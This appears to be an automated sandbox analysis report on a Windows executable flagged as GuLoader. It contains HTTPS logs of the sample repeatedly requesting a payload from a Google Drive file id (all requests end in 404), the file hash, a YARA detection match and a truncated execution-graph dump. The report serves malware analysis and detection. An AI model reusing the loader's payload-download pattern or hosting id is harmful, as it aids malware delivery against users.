                                                            Content-Security-Policy: script-src 'nonce-4jC8RBl_ayfaOIJ4bJUxNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Length: 1652
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Content-Security-Policy: sandbox allow-scripts
                                                            Connection: close
                                                            2025-01-10 14:57:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 4a 5f 68 38 49 38 57 4e 53 69 64 53 65 2d 49 6d 6c 55 5a 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7J_h8I8WNSidSe-ImlUZ4g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749977142.250.184.2384438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:13 UTC418OUTGET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:14 UTC1920INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:14 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Content-Security-Policy: script-src 'nonce-o8RKiOqYib2sHgIEY-nsfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.749978142.250.185.974438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:14 UTC460OUTGET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:15 UTC1851INHTTP/1.1 404 Not Found
                                                            X-GUploader-UploadID: AFIdbgTwhA3OgRxVffrwSXcTDjCSYS37psufADnt9p3fq_NITfGfqLOuBl96GtU7SQLSNpsP1WaECA0
                                                            Content-Type: text/html; charset=utf-8
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:15 GMT
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-VPIQ1MRdU6BS2tOVTzba3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Content-Length: 1652
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Content-Security-Policy: sandbox allow-scripts
                                                            Connection: close
                                                            2025-01-10 14:57:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 55 35 5a 79 38 38 31 4b 4a 47 79 58 47 56 76 52 45 72 65 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3U5Zy881KJGyXGVvRErevA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.749979142.250.184.2384438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:16 UTC418OUTGET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:16 UTC1920INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:16 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Content-Security-Policy: script-src 'nonce-WQKzbjhreEzdobseP1bH7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.749980142.250.185.974438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:17 UTC460OUTGET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:17 UTC1844INHTTP/1.1 404 Not Found
                                                            X-GUploader-UploadID: AFIdbgT7WsJs7wvm733yZCtJqCx7jvUhXdiwJvYbVvQ3hKZuBFunfQF8ooeAX6XKVS72qRtk
                                                            Content-Type: text/html; charset=utf-8
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:17 GMT
                                                            Content-Security-Policy: script-src 'nonce-6Fm_4QBLjGAbeTYJbyEllA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Length: 1652
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Content-Security-Policy: sandbox allow-scripts
                                                            Connection: close
                                                            2025-01-10 14:57:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 39 76 6f 58 41 4a 69 4e 4f 53 6d 77 48 35 70 68 31 6e 69 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_9voXAJiNOSmwH5ph1nicg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.749981142.250.184.2384438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:18 UTC418OUTGET /uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Cache-Control: no-cache
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:18 UTC1920INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:18 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-Nqdk3fSY-h3lHuZo5nbaXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.749982142.250.185.974438044C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 14:57:19 UTC460OUTGET /download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Cache-Control: no-cache
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            Cookie: NID=520=PPCzvAZH91S4t38_xJb2j5Oz_a7Wsn4IR1pUDx3DdKhBmojhuXo1x-8yjKlQkng09g1y41duFrqBMYj8tOtz-VMI2AivoRPwQonxqaQ79-Gggx35aTnAtoGnZpI0mWgfo1_Rx25ZzEEg-Kt_L7iz2i2VbkzYc3RQlTiZfwqfa0UTLMd5k9Mw2sqs
                                                            2025-01-10 14:57:19 UTC1851INHTTP/1.1 404 Not Found
                                                            X-GUploader-UploadID: AFiumC5LKexngoAHo5bjj0Sh85FQ5LzNKt-QAP5_SQxK0Sfq9s9Qps7gIxkJSEV1F8qVIqmikLiO5KI
                                                            Content-Type: text/html; charset=utf-8
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 10 Jan 2025 14:57:19 GMT
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-J3jdjFcVKRNgzr-z6pzFmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                            Content-Length: 1652
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Content-Security-Policy: sandbox allow-scripts
                                                            Connection: close
                                                            2025-01-10 14:57:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 39 33 32 70 76 6f 7a 45 6d 6d 6d 31 50 4f 4f 50 64 6f 66 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y932pvozEmmm1POOPdofWQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:09:53:14
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SvmL9tW29w.exe"
                                                            Imagebase:0x400000
                                                            File size:891'920 bytes
                                                            MD5 hash:F189174B0A4A4E9689B6C47693BB6D37
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3747394738.0000000004831000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:9
                                                            Start time:11:54:00
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SvmL9tW29w.exe"
                                                            Imagebase:0x400000
                                                            File size:891'920 bytes
                                                            MD5 hash:F189174B0A4A4E9689B6C47693BB6D37
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.3745241820.0000000003591000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:17.1%
                                                              Dynamic/Decrypted Code Coverage:13.9%
                                                              Signature Coverage:16.2%
                                                              Total number of Nodes:1533
                                                              Total number of Limit Nodes:47
                                                              execution_graph 5565 401d44 5566 402bac 17 API calls 5565->5566 5567 401d52 SetWindowLongA 5566->5567 5568 402a5a 5567->5568 4125 401ec5 4133 402bac 4125->4133 4127 401ecb 4128 402bac 17 API calls 4127->4128 4129 401ed7 4128->4129 4130 401ee3 ShowWindow 4129->4130 4131 401eee EnableWindow 4129->4131 4132 402a5a 4130->4132 4131->4132 4136 40618a 4133->4136 4135 402bc1 4135->4127 4149 406197 4136->4149 4137 4063b9 4138 4063ce 4137->4138 4169 4060f7 lstrcpynA 4137->4169 4138->4135 4140 406393 lstrlenA 4140->4149 4143 40618a 10 API calls 4143->4140 4145 4062af GetSystemDirectoryA 4145->4149 4146 4062c2 GetWindowsDirectoryA 4146->4149 4148 4062f6 SHGetSpecialFolderLocation 4148->4149 4152 40630e SHGetPathFromIDListA CoTaskMemFree 4148->4152 4149->4137 4149->4140 4149->4143 4149->4145 4149->4146 4149->4148 4150 40618a 10 API calls 4149->4150 4151 40633c lstrcatA 4149->4151 4153 405fde 4149->4153 4158 4063d2 4149->4158 4167 406055 wsprintfA 4149->4167 4168 4060f7 lstrcpynA 4149->4168 4150->4149 4151->4149 4152->4149 4170 405f7d 4153->4170 4156 406012 RegQueryValueExA RegCloseKey 4157 406041 4156->4157 4157->4149 4164 4063de 4158->4164 4159 40644a CharPrevA 4160 406446 4159->4160 4160->4159 4162 406465 4160->4162 4161 40643b CharNextA 4161->4160 4161->4164 4162->4149 4164->4160 4164->4161 4165 406429 CharNextA 4164->4165 4166 406436 